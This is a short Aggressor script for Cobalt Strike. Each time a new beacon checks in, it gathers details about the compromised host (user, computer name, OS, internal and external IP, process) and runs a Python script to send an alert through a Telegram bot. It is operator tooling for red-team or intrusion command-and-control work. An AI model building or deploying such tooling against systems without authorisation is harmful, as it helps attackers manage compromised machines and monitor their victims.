# CS Beacon Notifier
# A Cobalt Strike Beacon Notifier Via Telegram Bot
# Author @lynxbinz

$pyScript = "/home/purpleVPS/telegramNotification.py";

on beacon_initial {
	$userName = beacon_info($1, "user");
    $computerName = beacon_info($1, "computer");
	$operatingSystem = beacon_info($1, "os");
	$architecture = beacon_info($1, "arch");
	$buildVersion = beacon_info($1, "build");
    $inIP = beacon_info($1, "internal");
    $exIP = beacon_info($1, "external");
	$processName = beacon_info($1, "process");
    $infoText_short = "New Beacon at Teamserver -  $computerName \ $userName";

    # Mensaje expandido con más info
    $infoText_large = "New Beacon at Teamserver - Computer: $computerName | User: $userName | OS: $operatingSystem | Arch: $architecture | Internal IP: $inIP | External IP: $exIP | Process: $processName";
    
    $command = array("python3", $pyScript, $infoText_short);    
    # Usa exec_cmd para ejecutar en el servidor local
    exec($command);
}
